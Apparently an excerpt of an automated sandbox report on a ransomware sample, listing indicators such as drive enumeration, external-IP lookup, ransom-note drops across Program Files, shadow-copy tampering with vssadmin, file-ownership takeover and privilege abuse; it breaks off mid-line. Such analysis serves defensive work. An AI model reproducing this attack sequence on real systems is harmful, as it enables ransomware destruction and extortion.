941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exedescription ioc process File opened for modification C:\Users\Admin\Pictures\Saved Pictures\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Users\Admin\Desktop\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Users\Admin\Saved Games\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Users\Public\Libraries\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Users\Public\Documents\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Users\Admin\Downloads\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Users\Admin\Videos\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Users\Admin\Pictures\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Users\Admin\Links\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Users\Public\Downloads\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Users\Public\Music\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Users\Admin\3D Objects\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Users\Public\Pictures\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Users\Public\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Users\Admin\Searches\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Users\Public\AccountPictures\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files (x86)\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Users\Public\Desktop\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Users\Admin\OneDrive\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Users\Public\Videos\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Users\Admin\Favorites\Links\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Users\Admin\Pictures\Camera Roll\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Users\Admin\Favorites\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Users\Admin\Contacts\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Users\Admin\Music\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Users\Admin\Documents\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe -
Enumerates connected drives 3 TTPs 44 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exetm9TVtDr64.exedescription ioc process File opened (read-only) \??\V: 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened (read-only) \??\L: 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened (read-only) \??\B: tm9TVtDr64.exe File opened (read-only) \??\J: tm9TVtDr64.exe File opened (read-only) \??\M: tm9TVtDr64.exe File opened (read-only) \??\N: tm9TVtDr64.exe File opened (read-only) \??\P: tm9TVtDr64.exe File opened (read-only) \??\Q: 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened (read-only) \??\O: 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened (read-only) \??\E: tm9TVtDr64.exe File opened (read-only) \??\H: tm9TVtDr64.exe File opened (read-only) \??\V: tm9TVtDr64.exe File opened (read-only) \??\Z: tm9TVtDr64.exe File opened (read-only) \??\P: 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened (read-only) \??\I: tm9TVtDr64.exe File opened (read-only) \??\R: tm9TVtDr64.exe File opened (read-only) \??\U: tm9TVtDr64.exe File opened (read-only) \??\Z: 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened (read-only) \??\M: 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened (read-only) \??\K: 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened (read-only) \??\G: 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened (read-only) \??\G: tm9TVtDr64.exe File opened (read-only) \??\Y: 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened (read-only) \??\H: 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened (read-only) \??\L: tm9TVtDr64.exe File opened (read-only) \??\S: tm9TVtDr64.exe File opened (read-only) \??\Y: tm9TVtDr64.exe File opened (read-only) \??\W: 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened (read-only) \??\U: 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened (read-only) \??\T: 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened (read-only) \??\E: 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened (read-only) \??\K: tm9TVtDr64.exe File opened (read-only) \??\Q: tm9TVtDr64.exe File opened (read-only) \??\A: tm9TVtDr64.exe File opened (read-only) \??\O: tm9TVtDr64.exe File opened (read-only) \??\X: 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened (read-only) \??\S: 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened (read-only) \??\R: 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened (read-only) \??\N: 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened (read-only) \??\J: 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened (read-only) \??\I: 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened (read-only) \??\T: tm9TVtDr64.exe File opened (read-only) \??\W: tm9TVtDr64.exe File opened (read-only) \??\X: tm9TVtDr64.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 152 myexternalip.com -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
Processes:
reg.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-3045580317-3728985860-206385570-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Roaming\\KH0E6zhK.bmp" reg.exe -
Drops file in Program Files directory 64 IoCs
Processes:
941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exedescription ioc process File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\classlist 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\jfxswt.jar 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\VideoLAN\VLC\locale\mai\LC_MESSAGES\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\or\LC_MESSAGES\vlc.mo 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Trust Protection Lists\Sigma\LICENSE 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Java\jdk-1.8\bin\javadoc.exe 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Java\jdk-1.8\include\win32\bridge\AccessBridgeCalls.c 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\security\public_suffix_list.dat 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Java\jre-1.8\legal\jdk\dynalink.md 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\deploy\messages.properties 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Mozilla Firefox\omni.ja 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\as_IN\LC_MESSAGES\vlc.mo 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\VideoLAN\VLC\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\VideoLAN\VLC\locale\gd\LC_MESSAGES\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\msedge.exe 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Java\jre-1.8\legal\jdk\dom.md 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Java\jdk-1.8\legal\jdk\mesa3d.md 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\jfr.jar 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\identity_proxy\resources.pri.DATA 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Trust Protection Lists\Mu\Other 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Mozilla Firefox\crashreporter.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\jce.jar 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\VideoLAN\VLC\skins\fonts\FreeSansBold.ttf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\VideoLAN\VLC\plugins\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Google\Chrome\Application\106.0.5249.119\Locales\et.pak 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\bin\policytool.exe 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\Google\Chrome\Application\106.0.5249.119\WidevineCdm\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\UnlockUpdate.inf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\co\LC_MESSAGES\vlc.mo 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\requests\browse.xml 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Locales\km.pak 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Trust Protection Lists\Sigma\Social 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.0\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Java\jre-1.8\legal\jdk\xalan.md 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ast\LC_MESSAGES\vlc.mo 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\VideoLAN\VLC\locale\mk\LC_MESSAGES\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\VisualElements\LogoDev.png 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Java\jdk-1.8\bin\wsgen.exe 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Java\jdk-1.8\bin\orbd.exe 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\legal\jdk\pkcs11cryptotoken.md 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\he\LC_MESSAGES\vlc.mo 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\jfr\default.jfc 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\calendars.properties 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Java\jdk-1.8\legal\jdk\colorimaging.md 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Java\jre-1.8\legal\javafx\icu_web.md 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\legal\javafx\icu_web.md 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\images\cursors\win32_MoveDrop32x32.gif 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\StartUnpublish.vssx 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Locales\hi.pak 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\VideoLAN\VLC\THANKS.txt 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Locales\ur.pak 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Locales\ru.pak 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\VideoLAN\VLC\lua\sd\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Trust Protection Lists\Sigma\Entities 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\20240226140807.pma 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Google\Chrome\Application\chrome.exe 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Java\jre-1.8\legal\javafx\libffi.md 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\pl\LC_MESSAGES\vlc.mo 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\Locales\kk.pak.DATA 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files (x86)\Microsoft.NET\RedistList\AssemblyList_4_extended.xml 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Java\jdk-1.8\lib\deployment.config 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Java\jre-1.8\legal\javafx\webkit.md 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
vssadmin.exepid process 6048 vssadmin.exe -
Suspicious behavior: EnumeratesProcesses 12 IoCs
Processes:
powershell.exetm9TVtDr64.exepid process 2248 powershell.exe 2248 powershell.exe 2248 powershell.exe 1824 tm9TVtDr64.exe 1824 tm9TVtDr64.exe 1824 tm9TVtDr64.exe 1824 tm9TVtDr64.exe 1824 tm9TVtDr64.exe 1824 tm9TVtDr64.exe 1824 tm9TVtDr64.exe 1824 tm9TVtDr64.exe 1824 tm9TVtDr64.exe -
Suspicious behavior: LoadsDriver 1 IoCs
Processes:
tm9TVtDr64.exepid process 1824 tm9TVtDr64.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exetakeown.exetm9TVtDr64.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exevssvc.exetakeown.exeWMIC.exedescription pid process Token: SeDebugPrivilege 2248 powershell.exe Token: SeTakeOwnershipPrivilege 2104 takeown.exe Token: SeDebugPrivilege 1824 tm9TVtDr64.exe Token: SeLoadDriverPrivilege 1824 tm9TVtDr64.exe Token: SeTakeOwnershipPrivilege 5940 takeown.exe Token: SeTakeOwnershipPrivilege 5700 takeown.exe Token: SeTakeOwnershipPrivilege 5324 takeown.exe Token: SeTakeOwnershipPrivilege 3716 takeown.exe Token: SeTakeOwnershipPrivilege 5996 takeown.exe Token: SeTakeOwnershipPrivilege 5744 takeown.exe Token: SeTakeOwnershipPrivilege 3440 takeown.exe Token: SeTakeOwnershipPrivilege 6056 takeown.exe Token: SeTakeOwnershipPrivilege 3676 takeown.exe Token: SeTakeOwnershipPrivilege 4372 takeown.exe Token: SeTakeOwnershipPrivilege 2928 takeown.exe Token: SeTakeOwnershipPrivilege 6056 takeown.exe Token: SeTakeOwnershipPrivilege 1564 takeown.exe Token: SeTakeOwnershipPrivilege 5212 takeown.exe Token: SeBackupPrivilege 5912 vssvc.exe Token: SeRestorePrivilege 5912 vssvc.exe Token: SeAuditPrivilege 5912 vssvc.exe Token: SeTakeOwnershipPrivilege 4420 takeown.exe Token: SeIncreaseQuotaPrivilege 5388 WMIC.exe Token: SeSecurityPrivilege 5388 WMIC.exe Token: SeTakeOwnershipPrivilege 5388 WMIC.exe Token: SeLoadDriverPrivilege 5388 WMIC.exe Token: SeSystemProfilePrivilege 5388 WMIC.exe Token: SeSystemtimePrivilege 5388 WMIC.exe Token: SeProfSingleProcessPrivilege 5388 WMIC.exe Token: SeIncBasePriorityPrivilege 5388 WMIC.exe Token: SeCreatePagefilePrivilege 5388 WMIC.exe Token: SeBackupPrivilege 5388 WMIC.exe Token: SeRestorePrivilege 5388 WMIC.exe Token: SeShutdownPrivilege 5388 WMIC.exe Token: SeDebugPrivilege 5388 WMIC.exe Token: SeSystemEnvironmentPrivilege 5388 WMIC.exe Token: SeRemoteShutdownPrivilege 5388 WMIC.exe Token: SeUndockPrivilege 5388 WMIC.exe Token: SeManageVolumePrivilege 5388 WMIC.exe Token: 33 5388 WMIC.exe Token: 34 5388 WMIC.exe Token: 35 5388 WMIC.exe Token: 36 5388 WMIC.exe Token: SeIncreaseQuotaPrivilege 5388 WMIC.exe Token: SeSecurityPrivilege 5388 WMIC.exe Token: SeTakeOwnershipPrivilege 5388 WMIC.exe Token: SeLoadDriverPrivilege 5388 WMIC.exe Token: SeSystemProfilePrivilege 5388 WMIC.exe Token: SeSystemtimePrivilege 5388 WMIC.exe Token: SeProfSingleProcessPrivilege 5388 WMIC.exe Token: SeIncBasePriorityPrivilege 5388 WMIC.exe Token: SeCreatePagefilePrivilege 5388 WMIC.exe Token: SeBackupPrivilege 5388 WMIC.exe Token: SeRestorePrivilege 5388 WMIC.exe Token: SeShutdownPrivilege 5388 WMIC.exe Token: SeDebugPrivilege 5388 WMIC.exe Token: SeSystemEnvironmentPrivilege 5388 WMIC.exe Token: SeRemoteShutdownPrivilege 5388 WMIC.exe Token: SeUndockPrivilege 5388 WMIC.exe Token: SeManageVolumePrivilege 5388 WMIC.exe Token: 33 5388 WMIC.exe Token: 34 5388 WMIC.exe Token: 35 5388 WMIC.exe Token: 36 5388 WMIC.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.execmd.execmd.execmd.execmd.execmd.exetm9TVtDr.execmd.execmd.exedescription pid process target process PID 2016 wrote to memory of 1584 2016 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe cmd.exe PID 2016 wrote to memory of 1584 2016 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe cmd.exe PID 2016 wrote to memory of 1584 2016 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe cmd.exe PID 2016 wrote to memory of 5040 2016 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe NWZMgl5M.exe PID 2016 wrote to memory of 5040 2016 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe NWZMgl5M.exe PID 2016 wrote to memory of 5040 2016 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe NWZMgl5M.exe PID 2016 wrote to memory of 2228 2016 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe cmd.exe PID 2016 wrote to memory of 2228 2016 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe cmd.exe PID 2016 wrote to memory of 2228 2016 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe cmd.exe PID 2228 wrote to memory of 2248 2228 cmd.exe powershell.exe PID 2228 wrote to memory of 2248 2228 cmd.exe powershell.exe PID 2228 wrote to memory of 2248 2228 cmd.exe powershell.exe PID 2016 wrote to memory of 888 2016 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe cmd.exe PID 2016 wrote to memory of 888 2016 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe cmd.exe PID 2016 wrote to memory of 888 2016 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe cmd.exe PID 2016 wrote to memory of 3556 2016 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe cmd.exe PID 2016 wrote to memory of 3556 2016 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe cmd.exe PID 2016 wrote to memory of 3556 2016 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe cmd.exe PID 888 wrote to memory of 3960 888 cmd.exe reg.exe PID 888 wrote to memory of 3960 888 cmd.exe reg.exe PID 888 wrote to memory of 3960 888 cmd.exe reg.exe PID 3556 wrote to memory of 4612 3556 cmd.exe wscript.exe PID 3556 wrote to memory of 4612 3556 cmd.exe wscript.exe PID 3556 wrote to memory of 4612 3556 cmd.exe wscript.exe PID 888 wrote to memory of 4564 888 cmd.exe reg.exe PID 888 wrote to memory of 4564 888 cmd.exe reg.exe PID 888 wrote to memory of 4564 888 cmd.exe reg.exe PID 888 wrote to memory of 3436 888 cmd.exe reg.exe PID 888 wrote to memory of 3436 888 cmd.exe reg.exe PID 888 wrote to memory of 3436 888 cmd.exe reg.exe PID 2016 wrote to memory of 4576 2016 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe cmd.exe PID 2016 wrote to memory of 4576 2016 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe cmd.exe PID 2016 wrote to memory of 4576 2016 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe cmd.exe PID 4576 wrote to memory of 2680 4576 cmd.exe cacls.exe PID 4576 wrote to memory of 2680 4576 cmd.exe cacls.exe PID 4576 wrote to memory of 2680 4576 cmd.exe cacls.exe PID 4576 wrote to memory of 2104 4576 cmd.exe takeown.exe PID 4576 wrote to memory of 2104 4576 cmd.exe takeown.exe PID 4576 wrote to memory of 2104 4576 cmd.exe takeown.exe PID 4576 wrote to memory of 916 4576 cmd.exe cmd.exe PID 4576 wrote to memory of 916 4576 cmd.exe cmd.exe PID 4576 wrote to memory of 916 4576 cmd.exe cmd.exe PID 916 wrote to memory of 3296 916 cmd.exe tm9TVtDr.exe PID 916 wrote to memory of 3296 916 cmd.exe tm9TVtDr.exe PID 916 wrote to memory of 3296 916 cmd.exe tm9TVtDr.exe PID 3296 wrote to memory of 1824 3296 tm9TVtDr.exe tm9TVtDr64.exe PID 3296 wrote to memory of 1824 3296 tm9TVtDr.exe tm9TVtDr64.exe PID 2016 wrote to memory of 3812 2016 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe cmd.exe PID 2016 wrote to memory of 3812 2016 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe cmd.exe PID 2016 wrote to memory of 3812 2016 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe cmd.exe PID 3812 wrote to memory of 4372 3812 cmd.exe 